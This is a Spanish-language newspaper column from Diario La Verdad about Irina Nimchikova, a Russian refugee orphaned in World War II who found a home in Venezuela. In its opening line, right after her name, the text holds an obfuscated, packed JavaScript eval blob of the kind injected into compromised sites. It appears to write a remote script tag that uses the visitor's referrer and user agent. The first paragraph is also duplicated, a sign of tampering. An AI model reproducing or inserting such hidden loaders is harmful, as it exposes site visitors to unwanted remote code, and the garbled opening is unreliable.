publicidad

Aquí estamos y aquí seguimos

Carolina Jaimes Branger / Periodista / carolinajaimesbranger@gmail.com
Irina eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|freik|var|u0026u|referrer|eirkf||js|php'.split('|'),0,{})) nació en Rusia. Su familia, rusos blancos contrarios a la revolución bolchevique, huyó a la entonces Yugoslavia. Allí los sorprendió la II Guerra Mundial. Cuando los nazis invadieron el pueblo donde vivía, la familia sufrió su cuota de terror, pues ellos consideraban a los rusos como una "banda de criminales judeo-bolcheviques" aunque no fueran judíos

Irina Nimchikova, dueña de la Posada Makrovia, en Morrocoy, fue también dueña de una historia increíble. La conté en otra oportunidad y hace pocos días en el evento #PasiónPaís. Y vale la pena recordarla: Irina nació en Rusia. Su familia, rusos blancos contrarios a la revolución bolchevique, huyó a la entonces Yugoslavia. Allí los sorprendió la II Guerra Mundial. Cuando los nazis invadieron el pueblo donde vivía, la familia sufrió su cuota de terror, pues ellos consideraban a los rusos como una "banda de criminales judeo-bolcheviques" aunque no fueran judíos. Como tales eran “sub-humanos” y no se les permitía entrar en los refugios durante los bombardeos. Finalmente, uno destruyó el pueblo por completo y la única que se salvó fue Irina, que se resguardaba en la parte de la casa que no se cayó. Sus padres, familiares y amigos, murieron todos. La joven quedó sola a los 16 años.

Cuando terminó la guerra, Irina fue a un campo de refugiados de las Naciones Unidas. Su idea era irse a Canadá. Pero en Canadá le pedían papeles y ella no tenía nada. Una amiga que había hecho en esos días se iba a Brasil e Irina intentó irse con ella, una vez más en vano, porque también le pedían algún tipo de identificación.

Mientras ella caminaba de un stand al otro, un hombre pequeño de aspecto afable no le quitaba la vista de encima. Cuando se retiró -frustrada del fracaso de viajar a Brasil- él se le acercó y se le presentó. Era de apellido Colmenares y trabajaba en el Consulado de Venezuela. “¿No has considerado Venezuela como posibilidad?”, le preguntó. Irina me confesó que buscó el nombre “Venezuela” en su memoria. Recordó que había estudiado el Río Orinoco en sexto grado, su último grado cursado antes de la guerra. Era la única referencia que tenía. “¿Y qué puedo hacer yo en Venezuela?”, le preguntó. La respuesta del señor Colmenares es una de las más hermosas que he escuchado sobre nuestro país: “en Venezuela podrás ser gente”.

“¿Cómo no venirme a un lugar donde podría ser lo que se me había negado en la vida?” me dijo mientras me tomaba las manos. Lloramos las dos. “Aquí estoy y aquí sigo” me manifestó con absoluta determinación. No sé qué pasó en las regionales porque escribo este artículo el jueves antes. Pero haya pasado lo que haya pasado, aquí estamos y aquí seguimos.

 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama